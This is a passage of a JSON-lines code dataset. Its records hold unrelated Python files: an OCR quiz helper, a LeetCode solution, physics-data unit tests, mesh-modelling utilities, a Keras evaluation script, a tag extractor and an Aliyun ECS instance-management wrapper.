', '').replace('\\n',\n '')\n try:\n Que_ocr = re.findall('(?<=\\d\\.).*', Que_ocr)[0]\n except IndexError:\n pass\n\n Ans_img = Image.open('Ans_ocr.jpg')\n # Ans_img = Ans_img.convert('L') # Convert to grayscale\n # Ans_img = binarizing(Ans_img, 206) # Tunable threshold\n # Ans_img.save('Ans_ocr2.jpg')\n Ans_ocr = pytesseract.image_to_string(Ans_img, lang='chi_sim').replace(' ', '').split('\\n')\n Ans_ocr = [x for x in Ans_ocr if x != '']\n return Que_ocr, Ans_ocr\n\n\ndef p_it(Que_ocr, Ans_ocr):\n print(Que_ocr)\n for i in range(len(Ans_ocr)):\n print('{}: {}'.format(i + 1, Ans_ocr[i]))\n print('')\n\nif __name__ == '__main__':\n Que = '新装修的房子通常哪种化学物质含量会比较高?'\n Ans = ['甲醛', '苯', '甲醇']\n p_it(Que, 
Ans)","sub_path":"python_dt/common/screen_ocr.py","file_name":"screen_ocr.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"77582308","text":"# leetcode - https://leetcode.com/problems/permutation-sequence/\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n nums=list(range(1,n+1))\n permutation=''\n k-=1\n while n>0:\n n-=1\n index,k=divmod(k,math.factorial(n))\n permutation+=str(nums[index])\n nums.remove(nums[index])\n return permutation\n","sub_path":"leetcode/permutationSequence.py","file_name":"permutationSequence.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"515672158","text":"from datetime import date\n\n\nclass Game(object):\n __slots__ = 'redPlayer', 'redScore', 'bluePlayer', 'blueScore', 'time', 'skillChangeToBlue', 'redPosChange', 'redPosAfter', 'bluePosChange', 'bluePosAfter', 'redAchievements', 'blueAchievements', 'deletedBy', 'deletedAt'\n\n def __init__(self, redPlayer, redScore, bluePlayer, blueScore, time):\n self.redPlayer = redPlayer\n self.redScore = int(redScore)\n self.bluePlayer = bluePlayer\n self.blueScore = int(blueScore)\n self.time = int(time)\n self.skillChangeToBlue = 0\n self.redPosChange = None\n self.redPosAfter = None\n self.bluePosChange = None\n self.bluePosAfter = None\n self.redAchievements = None\n self.blueAchievements = None\n self.deletedBy = None\n self.deletedAt = None\n\n def isDeleted(self):\n return self.deletedAt is not None\n\n def timeAsDate(self):\n return date.fromtimestamp(self.time)\n","sub_path":"tntfl/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"273176212","text":"from operator import itemgetter\n\nimport numpy as np\n\n\nfrom pytest import mark\nparametrize = mark.parametrize\n\nfrom .. core import system_of_units as units\n\nfrom . import pmaps_functions as pmapf\nfrom . pmaps_functions import df_to_pmaps_dict\nfrom . 
pmaps_functions import df_to_s2si_dict\n\n\ndef test_integrate_charge():\n sipms = {1000: range(5),\n 1001: range(10)}\n charges = np.array([[1000,1001],[10,45]])\n charges_test = pmapf.integrate_charge(sipms)\n np.testing.assert_array_equal(charges, charges_test)\n\n\ndef test_width():\n initial_time = 10000\n width = 1000\n times = range(10000,initial_time + width+1)\n # Convert times to ns\n times = list(map(lambda t: t * units.ns, times))\n assert width == pmapf.width(times)\n assert width * units.ns / units.mus == pmapf.width(times, to_mus=True)\n\n\ndef test_load_pmaps(KrMC_pmaps):\n\n _, (s1t, s2t, s2sit), (_, _, _), (s1, s2, s2si) = KrMC_pmaps\n S1 = df_to_pmaps_dict(s1t)\n S2 = df_to_pmaps_dict(s2t)\n S2Si = df_to_s2si_dict(s2sit)\n\n for event, s1d in S1.items():\n for i, (t, E) in s1d.items():\n assert np.allclose(t, s1[event][i][0], rtol=1e-4)\n assert np.allclose(E, s1[event][i][1], rtol=1e-4)\n\n for event, s2d in S2.items():\n for i, (t, E) in s2d.items():\n assert np.allclose(t, s2[event][i][0], rtol=1e-4)\n assert np.allclose(E, s2[event][i][1], rtol=1e-4)\n\n for event, s2sid in S2Si.items():\n for i, sipm in s2sid.items():\n for nsipm, E in sipm.items():\n assert np.allclose(E, s2si[event][i][nsipm], rtol=1e-4)\n\n\n\n###############################################################\n# df_to_pmaps_dict-related tests\n###############################################################\ndef test_df_to_pmaps_dict_limit_events(KrMC_pmaps):\n max_events = 30\n _, (s1s, s2s, s2sis), (S1_evts, _, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s, max_events)\n s2dict = df_to_pmaps_dict(s2s, max_events)\n assert sorted(s1dict.keys()) == S1_evts[:7]\n assert sorted(s2dict.keys()) == []\n\n\ndef test_df_to_pmaps_dict_take_all_events_if_limit_too_high(KrMC_pmaps):\n max_events_is_more_than_available = 10000\n _, (s1s, s2s, s2sis), (S1_evts, S2_evts, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s, max_events_is_more_than_available)\n s2dict = df_to_pmaps_dict(s2s, max_events_is_more_than_available)\n assert sorted(s1dict.keys()) == S1_evts\n assert sorted(s2dict.keys()) == S2_evts\n\n\ndef test_df_to_pmaps_dict_default_number_of_events(KrMC_pmaps):\n # Read all events\n _, (s1s, s2s, s2sis), (S1_evts, S2_evts, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s)\n s2dict = df_to_pmaps_dict(s2s)\n assert sorted(s1dict.keys()) == S1_evts\n assert sorted(s2dict.keys()) == S2_evts\n\n\ndef test_df_to_pmaps_dict_negative_limit_takes_all_events(KrMC_pmaps):\n # Read all events\n negative_max_events = -23\n _, (s1s, s2s, s2sis), (S1_evts, S2_evts, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s, negative_max_events)\n s2dict = df_to_pmaps_dict(s2s, negative_max_events)\n assert sorted(list(s1dict.keys())) == S1_evts\n assert sorted(list(s2dict.keys())) == S2_evts\n\n\ndef test_df_to_pmaps_dict_arrays_lengths_are_equal(KrMC_pmaps):\n _, (_, s2s, _), (_, S2_evts, _), _ = KrMC_pmaps\n\n s2dict = df_to_pmaps_dict(s2s)\n for evt in s2dict.values():\n for peak in evt.values():\n assert len(peak.t) == len(peak.E)\n\n\ndef test_df_to_pmaps_dict_one_entry_per_event(s12_dataframe_converted):\n converted, original = s12_dataframe_converted\n number_of_events_in_original = len(set(original.event))\n assert len(converted) == number_of_events_in_original\n\n\ndef test_df_to_pmaps_dict_event_numbers_should_be_keys(s12_dataframe_converted):\n converted, original = s12_dataframe_converted\n event_numbers_in_original = set(original.event)\n for event_number in event_numbers_in_original:\n assert 
event_number in converted\n\n\ndef test_df_to_pmaps_dict_structure(s12_dataframe_converted):\n converted, _ = s12_dataframe_converted\n # Each event number is mapped to a subdict ...\n for event_no, subdict in converted.items():\n # in which peak numbers are mapped to a t,E pair ...\n for peak_no, peak_data in subdict.items():\n assert hasattr(peak_data, 't')\n assert hasattr(peak_data, 'E')\n for element in peak_data:\n assert type(element) is np.ndarray\n\n\ndef test_df_to_pmaps_dict_events_contain_peaks(s12_dataframe_converted):\n converted, _ = s12_dataframe_converted\n # Multiple peaks in one event ...\n # In event no 0, there are two peaks; evt 3 has one peak\n assert len(converted[0]) == 2\n assert len(converted[3]) == 1\n\n\ndef test_df_to_pmaps_dict_events_data_correct(s12_dataframe_converted):\n converted, original = s12_dataframe_converted\n\n all_peaks = [ converted[event][peak]\n for event in sorted(converted)\n for peak in sorted(converted[event])]\n\n converted_time = np.concatenate(list(map(itemgetter(0), all_peaks)))\n converted_ene = np.concatenate(list(map(itemgetter(1), all_peaks)))\n\n assert (converted_time == original.time).all()\n assert (converted_ene == original.ene ).all()\n\n\n###############################################################\n# df_to_s2si_dict-related tests\n###############################################################\ndef test_df_to_s2si_dict_limit_events(KrMC_pmaps):\n max_events = 30\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis, max_events)\n assert sorted(S2Sidict.keys()) == []\n\n\ndef test_df_to_s2si_dict_take_all_events_if_limit_too_high(KrMC_pmaps):\n max_events_is_more_than_available = 10000\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis, max_events_is_more_than_available)\n assert sorted(S2Sidict.keys()) == S2Si_evts\n\n\ndef test_df_to_s2si_dict_default_number_of_events(KrMC_pmaps):\n # Read all events\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis)\n assert sorted(S2Sidict.keys()) == S2Si_evts\n\n\ndef test_df_to_s2si_dict_negative_limit_takes_all_events(KrMC_pmaps):\n # Read all events\n negative_max_events = -23\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis, negative_max_events)\n assert sorted(S2Sidict.keys()) == S2Si_evts\n\n\ndef test_df_to_s2si_dict_number_of_slices_is_correct(KrMC_pmaps):\n _, (_, s2s, s2sis), (_, S2_evts, _), _ = KrMC_pmaps\n S2_energy = df_to_pmaps_dict( s2s)\n S2_tracking = df_to_s2si_dict (s2sis)\n\n event_numbers_seen_in_tracking_plane = set(S2_tracking)\n event_numbers_seen_in_energy_plane = set(S2_energy)\n\n common_event_numbers = set.intersection(event_numbers_seen_in_energy_plane,\n event_numbers_seen_in_tracking_plane)\n\n for event_no in common_event_numbers:\n tracking_peak_nos = set(S2_tracking[event_no])\n energy_peak_nos = set(S2_energy [event_no])\n\n for peak_no in set.intersection(energy_peak_nos, tracking_peak_nos):\n energy_peak = S2_energy [event_no][peak_no]\n tracking_peak = S2_tracking[event_no][peak_no]\n\n for sipm_no, tracking_peak_E in tracking_peak.items():\n assert len(energy_peak.E) == len(tracking_peak_E)\n\n\ndef test_df_to_s2si_dict_one_entry_per_event(s2si_dataframe_converted):\n converted, original = s2si_dataframe_converted\n number_of_events_in_original = len(set(original.event))\n assert len(converted) == number_of_events_in_original\n\n\ndef 
test_df_to_s2si_dict_event_numbers_should_be_keys(s2si_dataframe_converted):\n converted, original = s2si_dataframe_converted\n event_numbers_in_original = set(original.event)\n for event_number in event_numbers_in_original:\n assert event_number in converted\n\n\ndef test_df_to_s2si_dict_structure(s2si_dataframe_converted):\n converted, _ = s2si_dataframe_converted\n # Each event number is mapped to a subdict ...\n for event_no, subdict in converted.items():\n # in which peak numbers are mapped to a subdict ...\n for peak_no, peak_data in subdict.items():\n # in which SiPMs IDs are mapped to a t, E pair\n for sipm_no, sipm in peak_data.items():\n assert type(sipm) is np.ndarray\n\n\ndef test_df_to_s2si_dict_events_contain_peaks(s2si_dataframe_converted):\n converted, _ = s2si_dataframe_converted\n # Multiple peaks in one event ...\n # In event no 0, there are two peaks; evt 3 has one peak\n assert len(converted[0]) == 2\n assert len(converted[3]) == 1\n\n\ndef test_df_to_s2si_dict_events_data_correct(s2si_dataframe_converted):\n converted, original = s2si_dataframe_converted\n\n all_sipms = [ (sipm[0], sipm[1])\n for event in sorted(converted)\n for peak in sorted(converted[event])\n for sipm in sorted(converted[event][peak].items()) ]\n\n converted_sipm = np.array (list(map(itemgetter(0), all_sipms)))\n converted_ene = np.concatenate(list(map(itemgetter(1), all_sipms)))\n\n assert (converted_sipm == original.nsipm).all()\n assert (converted_ene[np.nonzero(converted_ene)] == original.ene ).all()\n","sub_path":"invisible_cities/reco/pmaps_functions_test.py","file_name":"pmaps_functions_test.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"512590895","text":"'''\nUtility functions for easing use of Zinc API.\nCreated on Jan 4, 2018\n\n@author: Richard Christie\n'''\n\nfrom opencmiss.zinc.field import Field\nfrom opencmiss.zinc.node import Node\nfrom scaffoldmaker.utils.interpolation import *\nimport scaffoldmaker.utils.vector as vector\n\ndef getOrCreateCoordinateField(fieldmodule, name='coordinates', componentsCount=3):\n '''\n Finds or creates a rectangular cartesian coordinate field.\n New field has component names, 'x', 'y', 'z'.\n Raises exception if existing field of name is not finite element type or has incorrect attributes.\n :param fieldmodule: Zinc fieldmodule to find or create field in.\n :param name: Name of field to find or create.\n :param componentsCount: Number of components / dimension of field.\n '''\n assert (componentsCount > 0) and (componentsCount <= 3), 'getOrCreateCoordinateField. Dimensions must be from 1 to 3'\n coordinates = fieldmodule.findFieldByName(name)\n if coordinates.isValid():\n coordinates = coordinates.castFiniteElement()\n assert coordinates.isValid(), 'getOrCreateCoordinateField. Existing field \\'' + name + '\\' is not finite element type'\n assert coordinates.getNumberOfComponents() == componentsCount, 'getOrCreateCoordinateField. Existing field \\'' + name + '\\' does not have ' + str(componentsCount) + ' components'\n assert coordinates.getCoordinateSystemType() == Field.COORDINATE_SYSTEM_TYPE_RECTANGULAR_CARTESIAN, 'getOrCreateCoordinateField. 
Existing field \\'' + name + '\\' is not rectangular Cartesian'\n return coordinates\n fieldmodule.beginChange()\n coordinates = fieldmodule.createFieldFiniteElement(componentsCount)\n coordinates.setName(name)\n coordinates.setManaged(True)\n coordinates.setTypeCoordinate(True)\n coordinates.setCoordinateSystemType(Field.COORDINATE_SYSTEM_TYPE_RECTANGULAR_CARTESIAN)\n for c in range(componentsCount):\n coordinates.setComponentName(c + 1, ['x', 'y', 'z'][c])\n fieldmodule.endChange()\n return coordinates\n\ndef getOrCreateElementXiField(fieldmodule, name='element_xi', mesh=None):\n '''\n Finds or creates a stored mesh location field for storing locations in the\n supplied mesh e.g. for defining on annotation points with mesh locations.\n Raises exception if existing field of name is not stored mesh location type.\n Note can't currently verify existing field stores locations in the supplied mesh.\n :param fieldmodule: Zinc fieldmodule to find or create field in.\n :param name: Name of field to find or create.\n :param mesh: Mesh to store locations in.\n '''\n if mesh is None:\n mesh = fieldmodule.findMeshByDimension(3)\n assert mesh.isValid(), 'getOrCreateElementXiField. Invalid mesh'\n elementXiField = fieldmodule.findFieldByName(name)\n if elementXiField.isValid():\n elementXiField = elementXiField.castStoredMeshLocation()\n assert elementXiField.isValid(), 'getOrCreateElementXiField. Existing field \\'' + name + '\\' is not stored mesh location type'\n return elementXiField\n fieldmodule.beginChange()\n elementXiField = fieldmodule.createFieldStoredMeshLocation(mesh)\n elementXiField.setName(name)\n elementXiField.setManaged(True)\n fieldmodule.endChange()\n return elementXiField\n\ndef getOrCreateLabelField(fieldmodule, name='label'):\n '''\n Finds or creates a stored string field for defining labels on nodes, e.g. annotation points.\n Raises exception if existing field of name is not string-valued.\n Note can't currently distinguish stored string from constant string fields.\n :param fieldmodule: Zinc fieldmodule to find or create field in.\n :param name: Name of field to find or create.\n '''\n labelField = fieldmodule.findFieldByName(name)\n if labelField.isValid():\n assert labelField.getValueType() == Field.VALUE_TYPE_STRING, 'getOrCreateLabelField. Existing field \\'' + name + '\\' is not string valued'\n return labelField\n fieldmodule.beginChange()\n labelField = fieldmodule.createFieldStoredString()\n labelField.setName(name)\n labelField.setManaged(True)\n fieldmodule.endChange()\n return labelField\n\ndef getElementNodeIdentifiers(element, eft):\n '''\n Get identifiers of all nodes used by eft in element.\n '''\n nodeIdentifiers = []\n nodeCount = eft.getNumberOfLocalNodes()\n for n in range(nodeCount):\n node = element.getNode(eft, n + 1)\n nodeIdentifiers.append(node.getIdentifier())\n return nodeIdentifiers\n\ndef getElementNodeIdentifiers4Node(element, eft):\n '''\n Get 4 node identifiers for an element with 4 basis nodes, handling\n collapses e.g. where eft has fewer nodes. 
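All of the getOrCreate* helpers above share one idiom: look the field up by name, validate it if it exists, otherwise create, name, and manage it inside a beginChange/endChange pair. A sketch of that idiom factored into one helper; the create and check callables are hypothetical placeholders, and only Zinc calls already used above appear:

```python
# Sketch of the find-or-create idiom shared by the helpers above. The
# 'create' and 'check' callables are hypothetical placeholders standing in
# for e.g. createFieldStoredString / castFiniteElement-style validation.
def get_or_create_field(fieldmodule, name, create, check=None):
    field = fieldmodule.findFieldByName(name)
    if field.isValid():
        if check is not None:
            check(field)          # raise if the existing field is unsuitable
        return field
    # group creation and naming into one change notification, as above
    fieldmodule.beginChange()
    field = create(fieldmodule)
    field.setName(name)
    field.setManaged(True)
    fieldmodule.endChange()
    return field

# e.g. label = get_or_create_field(fm, 'label',
#                                  lambda fm: fm.createFieldStoredString())
```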
Asserts basis has 4 nodes.\n :param element: Element to query.\n :param eft: Element field template nodes are stored for in element.\n :return: List of 4 local node identifiers.\n '''\n elementbasis = eft.getElementbasis()\n basisNodesCount = elementbasis.getNumberOfNodes()\n assert basisNodesCount == 4, 'getElementNodeIdentifiers4Node: Element ' + str(element.getIdentifier()) + ' is not using a 4 node basis'\n nodeIdentifiers = []\n fn = 1\n for n in range(basisNodesCount):\n ln = eft.getTermLocalNodeIndex(fn, 1)\n nodeIdentifiers.append(element.getNode(eft, ln).getIdentifier())\n fn += elementbasis.getNumberOfFunctionsPerNode(n + 1)\n return nodeIdentifiers\n\ndef getElementNodeIdentifiers8Node(element, eft):\n '''\n Get 8 node identifiers for an element with 8 basis nodes, handling\n collapses e.g. where eft has fewer nodes. Asserts basis has 8 nodes.\n :param element: Element to query.\n :param eft: Element field template nodes are stored for in element.\n :return: List of 8 local node identifiers.\n '''\n elementbasis = eft.getElementbasis()\n basisNodesCount = elementbasis.getNumberOfNodes()\n assert basisNodesCount == 8, 'getElementNodeIdentifiers8Node: Element ' + str(element.getIdentifier()) + ' is not using an 8 node basis'\n nodeIdentifiers = []\n fn = 1\n for n in range(basisNodesCount):\n ln = eft.getTermLocalNodeIndex(fn, 1)\n nodeIdentifiers.append(element.getNode(eft, ln).getIdentifier())\n fn += elementbasis.getNumberOfFunctionsPerNode(n + 1)\n return nodeIdentifiers\n\ndef getMaximumNodeIdentifier(nodeset):\n \"\"\"\n :return: Maximum node identifier in nodeset or -1 if none.\n \"\"\"\n maximumNodeId = -1\n nodeiterator = nodeset.createNodeiterator()\n node = nodeiterator.next()\n while node.isValid():\n id = node.getIdentifier()\n if id > maximumNodeId:\n maximumNodeId = id\n node = nodeiterator.next()\n return maximumNodeId\n\ndef getMaximumElementIdentifier(mesh):\n \"\"\"\n :return: Maximum element identifier in mesh or -1 if none.\n \"\"\"\n maximumElementId = -1\n elementiterator = mesh.createElementiterator()\n element = elementiterator.next()\n while element.isValid():\n id = element.getIdentifier()\n if id > maximumElementId:\n maximumElementId = id\n element = elementiterator.next()\n return maximumElementId\n\ndef interpolateNodesCubicHermite(cache, coordinates, xi, normal_scale, \\\n node1, derivative1, scale1, cross_derivative1, cross_scale1, \\\n node2, derivative2, scale2, cross_derivative2, cross_scale2):\n \"\"\"\n Interpolates position and first derivative with cubic Hermite basis.\n Interpolates cross derivative linearly.\n :param cache: Field cache to evaluate in.\n :param coordinates: Coordinates field.\n :param xi: Element coordinate to interpolate at.\n :param normal_scale: Magnitude of normal derivative to return.\n :param node1, node2: Start and end nodes.\n :param derivative1, derivative2: Node value label for derivatives.\n :param scale1, scale2: Real value scaling derivatives, to reverse if needed.\n :param cross_derivative1, cross_derivative2: Node value label for cross derivatives.\n :param cross_scale1, cross_scale2: Real value scaling cross_derivatives, to reverse if needed.\n :return: x, dx_ds, dx_ds_cross, dx_ds_normal\n \"\"\"\n cache.setNode(node1)\n result, v1 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n result, d1 = coordinates.getNodeParameters(cache, -1, derivative1, 1, 3 )\n result, d1c = coordinates.getNodeParameters(cache, -1, cross_derivative1, 1, 3 )\n d1 = [ scale1*d for d in d1 ]\n d1c = [ 
cross_scale1*d for d in d1c ]\n cache.setNode(node2)\n result, v2 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n result, d2 = coordinates.getNodeParameters(cache, -1, derivative2, 1, 3 )\n result, d2c = coordinates.getNodeParameters(cache, -1, cross_derivative2, 1, 3 )\n d2 = [ scale2*d for d in d2 ]\n d2c = [ cross_scale2*d for d in d2c ]\n\n arcLength = computeCubicHermiteArcLength(v1, d1, v2, d2, True)\n mag = arcLength/vector.magnitude(d1)\n d1 = [ mag*d for d in d1 ]\n mag = arcLength/vector.magnitude(d2)\n d2 = [ mag*d for d in d2 ]\n\n xr = 1.0 - xi\n x = interpolateCubicHermite(v1, d1, v2, d2, xi)\n dx_ds = interpolateCubicHermiteDerivative(v1, d1, v2, d2, xi)\n scale = min(xi, xr)\n dx_ds = [ scale*d for d in dx_ds ]\n dx_ds_cross = [ (xr*d1c[c] + xi*d2c[c]) for c in range(3) ]\n\n radialVector = vector.normalise(vector.crossproduct3(dx_ds_cross, dx_ds))\n dx_ds_normal = [ normal_scale*d for d in radialVector ]\n\n return x, dx_ds, dx_ds_cross, dx_ds_normal\n\ndef computeNodeDerivativeHermiteLagrange(cache, coordinates, node1, derivative1, scale1, node2, scale2):\n \"\"\"\n Computes the derivative at node2 from quadratic Hermite-Lagrange interpolation of\n node1 value and derivative1 to node2 value.\n :param cache: Field cache to evaluate in.\n :param coordinates: Coordinates field.\n :param node1, node2: Start and end nodes.\n :param derivative1: Node value label for derivative at node1.\n :param scale1, scale2: Scaling to apply to derivatives at nodes, e.g. -1.0 to reverse.\n :return: dx_dxi at node2\n \"\"\"\n cache.setNode(node1)\n result, v1 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n result, d1 = coordinates.getNodeParameters(cache, -1, derivative1, 1, 3 )\n d1 = [ d*scale1 for d in d1 ]\n cache.setNode(node2)\n result, v2 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n d2 = interpolateHermiteLagrangeDerivative(v1, d1, v2, 1.0)\n d2 = [ d*scale2 for d in d2 ]\n return d2\n","sub_path":"scaffoldmaker/utils/zinc_utils.py","file_name":"zinc_utils.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"167618613","text":"\nfrom PIL import Image\nimport numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\n#import tensorflow as tf\n#import keras\n#from keras import backend as K\n#from keras.callbacks import ModelCheckpoint\n#from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\n#from keras.backend.tensorflow_backend import set_session\n\n\nfrom tensorflow.python.keras.preprocessing import image\nfrom tensorflow.python.keras.models import Model,load_model\nfrom tensorflow.python.keras.callbacks import ModelCheckpoint\nfrom tensorflow.python.keras.layers import Dense, GlobalAveragePooling2D\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.python.keras.optimizers import SGD, Adam\n\n\nfrom model import *\n\ndef load_image(image_fname):\n img = Image.open(image_fname)\n img = img.resize((299, 299))\n imgarray = np.array(img)/255.0\n #imgarray = np.array(img)\n final = np.expand_dims(imgarray, axis = 0)\n return final\n\n\n#if __name__ == \"__main__\":\ndef main(args):\n\n# config = tf.ConfigProto()\n# config.gpu_options.allow_growth = True\n# set_session(tf.Session(config=config))\n\n\n #if os.path.exists(model_file):\n if os.path.exists(args.model_path):\n print 
(\"\\n*******existing model found at {}\".format(args.model_path))\n model = load_existing(args.model_path)\n #model = create_model(200, 4)\n #model.load_weights(args.model_path)\n \n else:\n print (\"\\n***creating a new model****\\n\")\n model = create_model(num_hidden,num_classes)\n\n #model = inception_v4.create_model(num_classes=4, finetune=False)\n #model.load_weights(args.model_path)\n\n cls2idx = {'MaineCoon': 0, 'Ocelot': 1, 'Singapura': 2, 'TurkishVan': 3}\n idx2cls = [k for k,v in sorted(cls2idx.items(), key=lambda x:x[1])]\n\n for dirname, sub_dirnames, filenames in os.walk(args.val_path):\n if not dirname.endswith(args.val_path.split('/')[-1]):\n idx = cls2idx[ dirname.split('/')[-1] ]\n print('Current Directory:', dirname)\n for filename in filenames:\n path = os.path.join(dirname, filename)\n #img = get_processed_image(path)\n img = load_image(path)\n y_pred = model.predict(img)\n print(idx2cls[np.argmax(y_pred[0])], '||', y_pred)\n\n\n\n #val_path = '/home/s/sws007/dataset/test_final'\n\n target_size = (299, 299)\n #val_gen = ImageDataGenerator(rescale=1./255).flow_from_directory(images_dir, target_size=target_size, batch_size=args.batch_size, class_mode='categorical', shuffle=True)\n val_gen = ImageDataGenerator(rescale=1./255).flow_from_directory(args.val_path, target_size=target_size, batch_size=args.batch_size, class_mode='categorical', shuffle=True)\n\n learning_rate=1e-3\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=learning_rate, decay=1e-3), metrics=['accuracy'])\n\n\n step_size_valid = val_gen.n // val_gen.batch_size\n print(model.evaluate_generator(val_gen, steps=step_size_valid, verbose=1))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_path', type=str, required=True)\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--val_path', type=str, required=True)\n args = parser.parse_args()\n main(args)\n\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"77984563","text":"from nltk.corpus import stopwords\nfrom nltk import FreqDist\nimport nltk\nfrom collections import defaultdict\nimport csv\nimport re\nimport sys\n\ndf = open('./data/test.csv')\n\ndef clear(context):\n letters = re.sub(\"[^a-zA-Z]\", \" \", context)\n context = letters.lower().split()\n stopword = set(stopwords.words('english'))\n clear = [c for c in context if c not in stopword]\n return clear\n\ndef remove_html(context):\n cleaner = re.compile('<.*?>')\n clean_text = re.sub(cleaner,'',context)\n return clean_text\n\ndef pick_frequent(context):\n freq = FreqDist(context)\n return freq\n\nExtra_wordpool = ['p','via','two','make','e','c','using','r','three', 'mu', 'eta', 'must', 'r', 'm', 'v']\n\nreader = csv.DictReader(df)\noutput = open(sys.argv[1],'w')\nwriter=csv.writer(output)\nwriter.writerow(['id','tags'])\n\nfor idx,row in enumerate(reader):\n title = clear(row['title'])\n content = remove_html(row['content'])\n content = clear(content)\n ft = pick_frequent(title)\n fc = pick_frequent(content)\n common = set(fc).intersection(ft)\n temp = []\n if len(common) == 0:\n for t in title:\n if t not in Extra_wordpool:\n temp.append(t)\n writer.writerow([row['id'],' '.join(temp)])\n else:\n writer.writerow([row['id'],' 
'.join(common)])\n","sub_path":"final/src/fff.py","file_name":"fff.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500659718","text":"from aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.acs_exception.exceptions import ClientException\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\nfrom aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest\nfrom aliyunsdkecs.request.v20140526.DescribeImagesRequest import DescribeImagesRequest\nfrom aliyunsdkecs.request.v20140526.DescribeRegionsRequest import DescribeRegionsRequest\nfrom aliyunsdkecs.request.v20140526.DescribeZonesRequest import DescribeZonesRequest\nfrom aliyunsdkecs.request.v20140526.CreateInstanceRequest import CreateInstanceRequest\nfrom aliyunsdkecs.request.v20140526.StopInstanceRequest import StopInstanceRequest\nfrom aliyunsdkecs.request.v20140526.DeleteInstanceRequest import DeleteInstanceRequest\nfrom aliyunsdkecs.request.v20140526.StartInstanceRequest import StartInstanceRequest\nfrom aliyunsdkecs.request.v20140526.DescribeInstanceStatusRequest import DescribeInstanceStatusRequest\nfrom aliyunsdkecs.request.v20140526.DescribeNetworkInterfacesRequest import DescribeNetworkInterfacesRequest\nfrom aliyunsdkecs.request.v20140526.RebootInstanceRequest import RebootInstanceRequest\nfrom aliyunsdkecs.request.v20140526.DescribeInstanceAttributeRequest import DescribeInstanceAttributeRequest\nfrom aliyunsdkecs.request.v20140526.CreateSecurityGroupRequest import CreateSecurityGroupRequest\nfrom aliyunsdkecs.request.v20140526.AllocatePublicIpAddressRequest import AllocatePublicIpAddressRequest\nimport json, time, socket\n\nparam1, param2 = \"\", \"\"\n\nclient = AcsClient(param1, param2, 'cn-beijing')\n\ndef setRegion(region):\n global client\n client = AcsClient(param1, param2, region)\n\ndef getImages():\n request = DescribeImagesRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n return response\n\ndef allocatePublicIpAddress(InstanceId):\n request = AllocatePublicIpAddressRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\n# print(json.dumps(getImages()[\"Images\"][\"Image\"], indent=4))\n\ndef createInstance(params):\n request = CreateInstanceRequest()\n request.set_accept_format('json')\n \n if \"SecurityGroupId\" in params:\n request.set_SecurityGroupId(params[\"SecurityGroupId\"])\n if \"ZoneId\" in params:\n request.set_ZoneId(params[\"ZoneId\"])\n if \"VSwitchId\" in params:\n request.set_VSwitchId(params[\"VSwitchId\"])\n\n request.set_ImageId(params[\"ImageId\"])\n request.set_InstanceType(params[\"InstanceType\"])\n \n request.set_InstanceName(params[\"InstanceName\"])\n request.set_InternetChargeType(params[\"InternetChargeType\"])\n request.set_AutoRenew(params[\"AutoRenew\"])\n request.set_InternetMaxBandwidthOut(params[\"InternetMaxBandwidthOut\"])\n request.set_Password(params[\"Password\"])\n \n request.set_SystemDiskSize(params[\"SystemDiskSize\"])\n request.set_SystemDiskCategory(params[\"SystemDiskCategory\"])\n \n request.set_IoOptimized(params[\"IoOptimized\"])\n request.set_InstanceChargeType(params[\"InstanceChargeType\"])\n\n response = client.do_action_with_exception(request)\n 
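# decode the raw byte response and parse it as JSON
    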
